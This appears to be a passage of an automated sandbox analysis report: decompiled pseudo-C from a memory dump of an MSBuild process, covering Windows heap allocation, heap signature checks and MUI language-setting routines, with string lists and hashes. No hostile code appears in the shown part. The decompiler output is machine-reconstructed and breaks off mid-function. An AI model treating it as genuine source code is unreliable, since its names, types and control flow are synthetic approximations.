                                            						_t173 = 1;
                                            						E010C49A4(_t181);
                                            						__eflags = _t177;
                                            						if(_t177 == 0) {
                                            							goto L49;
                                            						} else {
                                            							_t177 = _t177 + 0xfffffff8;
                                            							__eflags =  *((char*)(_t177 + 7)) - 5;
                                            							if( *((char*)(_t177 + 7)) == 5) {
                                            								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                            								__eflags = _t177;
                                            							}
                                            							_t154 = _t177;
                                            							 *(_t182 - 0x40) = _t177;
                                            							__eflags =  *(_t181 + 0x4c);
                                            							if( *(_t181 + 0x4c) != 0) {
                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                            								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                            								if(__eflags != 0) {
                                            									_push(_t154);
                                            									_t173 = _t177;
                                            									E010BFA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                            								}
                                            							}
                                            							__eflags =  *(_t177 + 2) & 0x00000002;
                                            							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                            								_t101 =  *(_t177 + 3);
                                            								 *(_t182 - 0x29) = _t101;
                                            								_t102 = _t101 & 0x000000ff;
                                            							} else {
                                            								_t130 = E01001F5B(_t177);
                                            								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                            								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                            								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                            									 *_t130 = 0;
                                            								} else {
                                            									_t131 = E010316C7(1, _t173);
                                            									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                            									 *_t165 = _t131;
                                            									_t130 = _t165;
                                            								}
                                            								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                            							}
                                            							 *(_t182 - 0x34) = _t102;
                                            							 *(_t182 - 0x28) = _t102;
                                            							__eflags =  *(_t181 + 0x4c);
                                            							if( *(_t181 + 0x4c) != 0) {
                                            								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                            								__eflags =  *_t177;
                                            							}
                                            							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                            							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                            								__eflags = 0;
                                            								E010C4496(_t181, 0);
                                            							}
                                            							__eflags =  *(_t182 - 0x24) -  *0x10f6360; // 0x0
                                            							_t104 =  *[fs:0x30];
                                            							if(__eflags != 0) {
                                            								_t105 =  *(_t104 + 0x68);
                                            								 *(_t182 - 0x4c) = _t105;
                                            								__eflags = _t105 & 0x00000800;
                                            								if((_t105 & 0x00000800) == 0) {
                                            									goto L49;
                                            								}
                                            								_t106 =  *(_t182 - 0x34);
                                            								__eflags = _t106;
                                            								if(_t106 == 0) {
                                            									goto L49;
                                            								}
                                            								__eflags = _t106 -  *0x10f6364; // 0x0
                                            								if(__eflags != 0) {
                                            									goto L49;
                                            								}
                                            								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x10f6366; // 0x0
                                            								if(__eflags != 0) {
                                            									goto L49;
                                            								}
                                            								_t108 =  *[fs:0x30];
                                            								__eflags =  *(_t108 + 0xc);
                                            								if( *(_t108 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(E010AD455(_t181,  *(_t182 - 0x28)));
                                            								_push( *(_t182 + 8));
                                            								E0100B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                            								goto L34;
                                            							} else {
                                            								__eflags =  *(_t104 + 0xc);
                                            								if( *(_t104 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push( *(_t182 + 8));
                                            								E0100B150("Just allocated block at %p for %Ix bytes\n",  *0x10f6360);
                                            								L34:
                                            								_t112 =  *[fs:0x30];
                                            								__eflags =  *((char*)(_t112 + 2));
                                            								if( *((char*)(_t112 + 2)) != 0) {
                                            									 *0x10f6378 = 1;
                                            									 *0x10f60c0 = 0;
                                            									asm("int3");
                                            									 *0x10f6378 = 0;
                                            								}
                                            								goto L49;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					_t181 =  *0x10f5708; // 0x0
                                            					 *0x10fb1e0(__ecx, __edx,  *(_t182 + 8));
                                            					 *_t181();
                                            					L50:
                                            					return E0105D130(0, _t177, _t181);
                                            				}
                                            			}






















                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 0-1745908468
                                            • Opcode ID: dd489e1832ceb90eb531ba6c84cc3e07b16c33daaded0ecafbc22542697c1279
                                            • Instruction ID: fb0b503fbf4d13b19aec5c4647416b43b4a092c8bc3ca599d43485f8714fc501
                                            • Opcode Fuzzy Hash: dd489e1832ceb90eb531ba6c84cc3e07b16c33daaded0ecafbc22542697c1279
                                            • Instruction Fuzzy Hash: 2691FE31A10685DBDB22DFA8C451AEDBBF2FF58B10F18806DE5C5ABA91C7369841DF01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E01013D34(signed int* __ecx) {
                                            				signed int* _v8;
                                            				char _v12;
                                            				signed int* _v16;
                                            				signed int* _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int* _v48;
                                            				signed int* _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				char _v68;
                                            				signed int _t140;
                                            				signed int _t161;
                                            				signed int* _t236;
                                            				signed int* _t242;
                                            				signed int* _t243;
                                            				signed int* _t244;
                                            				signed int* _t245;
                                            				signed int _t255;
                                            				void* _t257;
                                            				signed int _t260;
                                            				void* _t262;
                                            				signed int _t264;
                                            				void* _t267;
                                            				signed int _t275;
                                            				signed int* _t276;
                                            				short* _t277;
                                            				signed int* _t278;
                                            				signed int* _t279;
                                            				signed int* _t280;
                                            				short* _t281;
                                            				signed int* _t282;
                                            				short* _t283;
                                            				signed int* _t284;
                                            				void* _t285;
                                            
                                            				_v60 = _v60 | 0xffffffff;
                                            				_t280 = 0;
                                            				_t242 = __ecx;
                                            				_v52 = __ecx;
                                            				_v8 = 0;
                                            				_v20 = 0;
                                            				_v40 = 0;
                                            				_v28 = 0;
                                            				_v32 = 0;
                                            				_v44 = 0;
                                            				_v56 = 0;
                                            				_t275 = 0;
                                            				_v16 = 0;
                                            				if(__ecx == 0) {
                                            					_t280 = 0xc000000d;
                                            					_t140 = 0;
                                            					L50:
                                            					 *_t242 =  *_t242 | 0x00000800;
                                            					_t242[0x13] = _t140;
                                            					_t242[0x16] = _v40;
                                            					_t242[0x18] = _v28;
                                            					_t242[0x14] = _v32;
                                            					_t242[0x17] = _t275;
                                            					_t242[0x15] = _v44;
                                            					_t242[0x11] = _v56;
                                            					_t242[0x12] = _v60;
                                            					return _t280;
                                            				}
                                            				if(E01011B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v56 = 1;
                                            					if(_v8 != 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                            					}
                                            					_v8 = _t280;
                                            				}
                                            				if(E01011B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v60 =  *_v8;
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                            					_v8 = _t280;
                                            				}
                                            				if(E01011B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            					L16:
                                            					if(E01011B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            						L28:
                                            						if(E01011B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                            							L46:
                                            							_t275 = _v16;
                                            							L47:
                                            							_t161 = 0;
                                            							L48:
                                            							if(_v8 != 0) {
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                            							}
                                            							_t140 = _v20;
                                            							if(_t140 != 0) {
                                            								if(_t275 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                            									_t275 = 0;
                                            									_v28 = 0;
                                            									_t140 = _v20;
                                            								}
                                            							}
                                            							goto L50;
                                            						}
                                            						_t167 = _v12;
                                            						_t255 = _v12 + 4;
                                            						_v44 = _t255;
                                            						if(_t255 == 0) {
                                            							_t276 = _t280;
                                            							_v32 = _t280;
                                            						} else {
                                            							_t276 = L01024620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                            							_t167 = _v12;
                                            							_v32 = _t276;
                                            						}
                                            						if(_t276 == 0) {
                                            							_v44 = _t280;
                                            							_t280 = 0xc0000017;
                                            							goto L46;
                                            						} else {
                                            							E0104F3E0(_t276, _v8, _t167);
                                            							_v48 = _t276;
                                            							_t277 = E01051370(_t276, 0xfe4e90);
                                            							_pop(_t257);
                                            							if(_t277 == 0) {
                                            								L38:
                                            								_t170 = _v48;
                                            								if( *_v48 != 0) {
                                            									E0104BB40(0,  &_v68, _t170);
                                            									if(L010143C0( &_v68,  &_v24) != 0) {
                                            										_t280 =  &(_t280[0]);
                                            									}
                                            								}
                                            								if(_t280 == 0) {
                                            									_t280 = 0;
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                            									_v44 = 0;
                                            									_v32 = 0;
                                            								} else {
                                            									_t280 = 0;
                                            								}
                                            								_t174 = _v8;
                                            								if(_v8 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                            								}
                                            								_v8 = _t280;
                                            								goto L46;
                                            							}
                                            							_t243 = _v48;
                                            							do {
                                            								 *_t277 = 0;
                                            								_t278 = _t277 + 2;
                                            								E0104BB40(_t257,  &_v68, _t243);
                                            								if(L010143C0( &_v68,  &_v24) != 0) {
                                            									_t280 =  &(_t280[0]);
                                            								}
                                            								_t243 = _t278;
                                            								_t277 = E01051370(_t278, 0xfe4e90);
                                            								_pop(_t257);
                                            							} while (_t277 != 0);
                                            							_v48 = _t243;
                                            							_t242 = _v52;
                                            							goto L38;
                                            						}
                                            					}
                                            					_t191 = _v12;
                                            					_t260 = _v12 + 4;
                                            					_v28 = _t260;
                                            					if(_t260 == 0) {
                                            						_t275 = _t280;
                                            						_v16 = _t280;
                                            					} else {
                                            						_t275 = L01024620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                            						_t191 = _v12;
                                            						_v16 = _t275;
                                            					}
                                            					if(_t275 == 0) {
                                            						_v28 = _t280;
                                            						_t280 = 0xc0000017;
                                            						goto L47;
                                            					} else {
                                            						E0104F3E0(_t275, _v8, _t191);
                                            						_t285 = _t285 + 0xc;
                                            						_v48 = _t275;
                                            						_t279 = _t280;
                                            						_t281 = E01051370(_v16, 0xfe4e90);
                                            						_pop(_t262);
                                            						if(_t281 != 0) {
                                            							_t244 = _v48;
                                            							do {
                                            								 *_t281 = 0;
                                            								_t282 = _t281 + 2;
                                            								E0104BB40(_t262,  &_v68, _t244);
                                            								if(L010143C0( &_v68,  &_v24) != 0) {
                                            									_t279 =  &(_t279[0]);
                                            								}
                                            								_t244 = _t282;
                                            								_t281 = E01051370(_t282, 0xfe4e90);
                                            								_pop(_t262);
                                            							} while (_t281 != 0);
                                            							_v48 = _t244;
                                            							_t242 = _v52;
                                            						}
                                            						_t201 = _v48;
                                            						_t280 = 0;
                                            						if( *_v48 != 0) {
                                            							E0104BB40(_t262,  &_v68, _t201);
                                            							if(L010143C0( &_v68,  &_v24) != 0) {
                                            								_t279 =  &(_t279[0]);
                                            							}
                                            						}
                                            						if(_t279 == 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                            							_v28 = _t280;
                                            							_v16 = _t280;
                                            						}
                                            						_t202 = _v8;
                                            						if(_v8 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                            						}
                                            						_v8 = _t280;
                                            						goto L28;
                                            					}
                                            				}
                                            				_t214 = _v12;
                                            				_t264 = _v12 + 4;
                                            				_v40 = _t264;
                                            				if(_t264 == 0) {
                                            					_v20 = _t280;
                                            				} else {
                                            					_t236 = L01024620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                            					_t280 = _t236;
                                            					_v20 = _t236;
                                            					_t214 = _v12;
                                            				}
                                            				if(_t280 == 0) {
                                            					_t161 = 0;
                                            					_t280 = 0xc0000017;
                                            					_v40 = 0;
                                            					goto L48;
                                            				} else {
                                            					E0104F3E0(_t280, _v8, _t214);
                                            					_t285 = _t285 + 0xc;
                                            					_v48 = _t280;
                                            					_t283 = E01051370(_t280, 0xfe4e90);
                                            					_pop(_t267);
                                            					if(_t283 != 0) {
                                            						_t245 = _v48;
                                            						do {
                                            							 *_t283 = 0;
                                            							_t284 = _t283 + 2;
                                            							E0104BB40(_t267,  &_v68, _t245);
                                            							if(L010143C0( &_v68,  &_v24) != 0) {
                                            								_t275 = _t275 + 1;
                                            							}
                                            							_t245 = _t284;
                                            							_t283 = E01051370(_t284, 0xfe4e90);
                                            							_pop(_t267);
                                            						} while (_t283 != 0);
                                            						_v48 = _t245;
                                            						_t242 = _v52;
                                            					}
                                            					_t224 = _v48;
                                            					_t280 = 0;
                                            					if( *_v48 != 0) {
                                            						E0104BB40(_t267,  &_v68, _t224);
                                            						if(L010143C0( &_v68,  &_v24) != 0) {
                                            							_t275 = _t275 + 1;
                                            						}
                                            					}
                                            					if(_t275 == 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                            						_v40 = _t280;
                                            						_v20 = _t280;
                                            					}
                                            					_t225 = _v8;
                                            					if(_v8 != 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                            					}
                                            					_v8 = _t280;
                                            					goto L16;
                                            				}
                                            			}











































                                            Strings
                                            • Kernel-MUI-Language-Disallowed, xrefs: 01013E97
                                            • WindowsExcludedProcs, xrefs: 01013D6F
                                            • Kernel-MUI-Language-SKU, xrefs: 01013F70
                                            • Kernel-MUI-Language-Allowed, xrefs: 01013DC0
                                            • Kernel-MUI-Number-Allowed, xrefs: 01013D8C
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: 1b6470a94870581cba874155955354f34a50588ae3c4e5149f9c9a78a5f1a887
                                            • Instruction ID: 3f84dac8d148c95bf04815688ddeefe9b3bd5b6eb786a16caa05f0e5193083d7
                                            • Opcode Fuzzy Hash: 1b6470a94870581cba874155955354f34a50588ae3c4e5149f9c9a78a5f1a887
                                            • Instruction Fuzzy Hash: D7F14CB2D00619EBCB11DF99C980AEEBBF9FF18750F1440AAE985E7255D7749E00CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 29%
                                            			E010040E1(void* __edx) {
                                            				void* _t19;
                                            				void* _t29;
                                            
                                            				_t28 = _t19;
                                            				_t29 = __edx;
                                            				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Invalid heap signature for heap at %p", _t28);
                                            					if(_t29 != 0) {
                                            						E0100B150(", passed to %s", _t29);
                                            					}
                                            					_push("\n");
                                            					E0100B150();
                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            						 *0x10f6378 = 1;
                                            						asm("int3");
                                            						 *0x10f6378 = 0;
                                            					}
                                            					return 0;
                                            				}
                                            				return 1;
                                            			}






                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                            • API String ID: 0-188067316
                                            • Opcode ID: 0a9da623c4c1a944838426f10cc3cbc5931c6b416fc0cc2efee280710d868d43
                                            • Instruction ID: 83661982cbefd1ecf38885a12a6ac5f992121ca92bf1c9b017e5d308639bdea7
                                            • Opcode Fuzzy Hash: 0a9da623c4c1a944838426f10cc3cbc5931c6b416fc0cc2efee280710d868d43
                                            • Instruction Fuzzy Hash: 45014C76144685DEF2369769E40EFD67BE8DB90F70F188079F0849B6C1CEA9D440D211
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E0102A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                            				void* _v5;
                                            				signed short _v12;
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				signed short _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				signed short _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				signed short* _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				signed int _t131;
                                            				signed char _t134;
                                            				signed int _t138;
                                            				char _t141;
                                            				signed short _t142;
                                            				void* _t146;
                                            				signed short _t147;
                                            				intOrPtr* _t149;
                                            				intOrPtr _t156;
                                            				signed int _t167;
                                            				signed int _t168;
                                            				signed short* _t173;
                                            				signed short _t174;
                                            				intOrPtr* _t182;
                                            				signed short _t184;
                                            				intOrPtr* _t187;
                                            				intOrPtr _t197;
                                            				intOrPtr _t206;
                                            				intOrPtr _t210;
                                            				signed short _t211;
                                            				intOrPtr* _t212;
                                            				signed short _t214;
                                            				signed int _t216;
                                            				intOrPtr _t217;
                                            				signed char _t225;
                                            				signed short _t235;
                                            				signed int _t237;
                                            				intOrPtr* _t238;
                                            				signed int _t242;
                                            				unsigned int _t245;
                                            				signed int _t251;
                                            				intOrPtr* _t252;
                                            				signed int _t253;
                                            				intOrPtr* _t255;
                                            				signed int _t256;
                                            				void* _t257;
                                            				void* _t260;
                                            
                                            				_t256 = __edx;
                                            				_t206 = __ecx;
                                            				_t235 = _a4;
                                            				_v44 = __ecx;
                                            				_v24 = _t235;
                                            				if(_t235 == 0) {
                                            					L41:
                                            					return _t131;
                                            				}
                                            				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                            				if(_t251 == 0) {
                                            					__eflags =  *0x10f8748 - 1;
                                            					if( *0x10f8748 >= 1) {
                                            						__eflags =  *(__edx + 2) & 0x00000008;
                                            						if(( *(__edx + 2) & 0x00000008) == 0) {
                                            							_t110 = _t256 + 0xfff; // 0xfe7
                                            							__eflags = (_t110 & 0xfffff000) - __edx;
                                            							if((_t110 & 0xfffff000) != __edx) {
                                            								_t197 =  *[fs:0x30];
                                            								__eflags =  *(_t197 + 0xc);
                                            								if( *(_t197 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            									_t260 = _t257 + 4;
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									_t260 = _t257 + 8;
                                            								}
                                            								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                            								E0100B150();
                                            								_t257 = _t260 + 4;
                                            								__eflags =  *0x10f7bc8;
                                            								if(__eflags == 0) {
                                            									E010C2073(_t206, 1, _t251, __eflags);
                                            								}
                                            								_t235 = _v24;
                                            							}
                                            						}
                                            					}
                                            				}
                                            				_t134 =  *((intOrPtr*)(_t256 + 6));
                                            				if(_t134 == 0) {
                                            					_t210 = _t206;
                                            					_v48 = _t206;
                                            				} else {
                                            					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                            					_v48 = _t210;
                                            				}
                                            				_v5 =  *(_t256 + 2);
                                            				do {
                                            					if(_t235 > 0xfe00) {
                                            						_v12 = 0xfe00;
                                            						__eflags = _t235 - 0xfe01;
                                            						if(_t235 == 0xfe01) {
                                            							_v12 = 0xfdf0;
                                            						}
                                            						_t138 = 0;
                                            					} else {
                                            						_v12 = _t235 & 0x0000ffff;
                                            						_t138 = _v5;
                                            					}
                                            					 *(_t256 + 2) = _t138;
                                            					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                            					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                            					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                            						_t141 = 0;
                                            					} else {
                                            						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                            						_v40 = _t141;
                                            						if(_t141 >= 0xfe) {
                                            							_push(_t210);
                                            							E010CA80D(_t236, _t256, _t210, 0);
                                            							_t141 = _v40;
                                            						}
                                            					}
                                            					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                            					 *((char*)(_t256 + 6)) = _t141;
                                            					_t142 = _v12;
                                            					 *_t256 = _t142;
                                            					 *(_t256 + 3) = 0;
                                            					_t211 = _t142 & 0x0000ffff;
                                            					 *((char*)(_t256 + 7)) = 0;
                                            					_v20 = _t211;
                                            					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                            						_t119 = _t256 + 0x10; // -8
                                            						E0105D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                            						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                            						_t211 = _v20;
                                            					}
                                            					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                            					if(_t252 == 0) {
                                            						L56:
                                            						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                            						_t146 = _t206 + 0xc0;
                                            						goto L19;
                                            					} else {
                                            						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                            							L15:
                                            							_t185 = _t211;
                                            							goto L17;
                                            						} else {
                                            							while(1) {
                                            								_t187 =  *_t252;
                                            								if(_t187 == 0) {
                                            									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                            									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                            									goto L17;
                                            								}
                                            								_t252 = _t187;
                                            								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                            									continue;
                                            								}
                                            								goto L15;
                                            							}
                                            							while(1) {
                                            								L17:
                                            								_t212 = E0102AB40(_t206, _t252, 1, _t185, _t211);
                                            								if(_t212 != 0) {
                                            									_t146 = _t206 + 0xc0;
                                            									break;
                                            								}
                                            								_t252 =  *_t252;
                                            								_t211 = _v20;
                                            								_t185 =  *(_t252 + 0x14);
                                            							}
                                            							L19:
                                            							if(_t146 != _t212) {
                                            								_t237 =  *(_t206 + 0x4c);
                                            								_t253 = _v20;
                                            								while(1) {
                                            									__eflags = _t237;
                                            									if(_t237 == 0) {
                                            										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                            									} else {
                                            										_t184 =  *(_t212 - 8);
                                            										_t237 =  *(_t206 + 0x4c);
                                            										__eflags = _t184 & _t237;
                                            										if((_t184 & _t237) != 0) {
                                            											_t184 = _t184 ^  *(_t206 + 0x50);
                                            											__eflags = _t184;
                                            										}
                                            										_t147 = _t184 & 0x0000ffff;
                                            									}
                                            									__eflags = _t253 - (_t147 & 0x0000ffff);
                                            									if(_t253 <= (_t147 & 0x0000ffff)) {
                                            										goto L20;
                                            									}
                                            									_t212 =  *_t212;
                                            									__eflags = _t206 + 0xc0 - _t212;
                                            									if(_t206 + 0xc0 != _t212) {
                                            										continue;
                                            									} else {
                                            										goto L20;
                                            									}
                                            									goto L56;
                                            								}
                                            							}
                                            							L20:
                                            							_t149 =  *((intOrPtr*)(_t212 + 4));
                                            							_t33 = _t256 + 8; // -16
                                            							_t238 = _t33;
                                            							_t254 =  *_t149;
                                            							if( *_t149 != _t212) {
                                            								_push(_t212);
                                            								E010CA80D(0, _t212, 0, _t254);
                                            							} else {
                                            								 *_t238 = _t212;
                                            								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                            								 *_t149 = _t238;
                                            								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                            							}
                                            							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                            							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                            							if(_t255 == 0) {
                                            								L36:
                                            								if( *(_t206 + 0x4c) != 0) {
                                            									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                            									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                            								}
                                            								_t210 = _v48;
                                            								_t251 = _v12 & 0x0000ffff;
                                            								_t131 = _v20;
                                            								_t235 = _v24 - _t131;
                                            								_v24 = _t235;
                                            								_t256 = _t256 + _t131 * 8;
                                            								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                            									goto L41;
                                            								} else {
                                            									goto L39;
                                            								}
                                            							} else {
                                            								_t216 =  *_t256 & 0x0000ffff;
                                            								_v28 = _t216;
                                            								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                            									L28:
                                            									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                            									_v32 = _t242;
                                            									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                            										_t167 = _t242 + _t242;
                                            									} else {
                                            										_t167 = _t242;
                                            									}
                                            									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                            									_t168 = _t167 << 2;
                                            									_v40 = _t168;
                                            									_t206 = _v44;
                                            									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                            									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                            										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                            									}
                                            									_t217 = _v16;
                                            									if(_t217 != 0) {
                                            										_t173 = _t217 - 8;
                                            										_v52 = _t173;
                                            										_t174 =  *_t173;
                                            										__eflags =  *(_t206 + 0x4c);
                                            										if( *(_t206 + 0x4c) != 0) {
                                            											_t245 =  *(_t206 + 0x50) ^ _t174;
                                            											_v36 = _t245;
                                            											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                            											__eflags = _t245 >> 0x18 - _t225;
                                            											if(_t245 >> 0x18 != _t225) {
                                            												_push(_t225);
                                            												E010CA80D(_t206, _v52, 0, 0);
                                            											}
                                            											_t174 = _v36;
                                            											_t217 = _v16;
                                            											_t242 = _v32;
                                            										}
                                            										_v28 = _v28 - (_t174 & 0x0000ffff);
                                            										__eflags = _v28;
                                            										if(_v28 > 0) {
                                            											goto L34;
                                            										} else {
                                            											goto L33;
                                            										}
                                            									} else {
                                            										L33:
                                            										_t58 = _t256 + 8; // -16
                                            										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                            										_t206 = _v44;
                                            										_t217 = _v16;
                                            										L34:
                                            										if(_t217 == 0) {
                                            											asm("bts eax, edx");
                                            										}
                                            										goto L36;
                                            									}
                                            								} else {
                                            									goto L24;
                                            								}
                                            								while(1) {
                                            									L24:
                                            									_t182 =  *_t255;
                                            									if(_t182 == 0) {
                                            										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                            										__eflags = _t216;
                                            										goto L28;
                                            									}
                                            									_t255 = _t182;
                                            									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                            										continue;
                                            									} else {
                                            										goto L28;
                                            									}
                                            								}
                                            								goto L28;
                                            							}
                                            						}
                                            					}
                                            					L39:
                                            				} while (_t235 != 0);
                                            				_t214 = _v12;
                                            				_t131 =  *(_t206 + 0x54) ^ _t214;
                                            				 *(_t256 + 4) = _t131;
                                            				if(_t214 == 0) {
                                            					__eflags =  *0x10f8748 - 1;
                                            					if( *0x10f8748 >= 1) {
                                            						_t127 = _t256 + 0xfff; // 0xfff
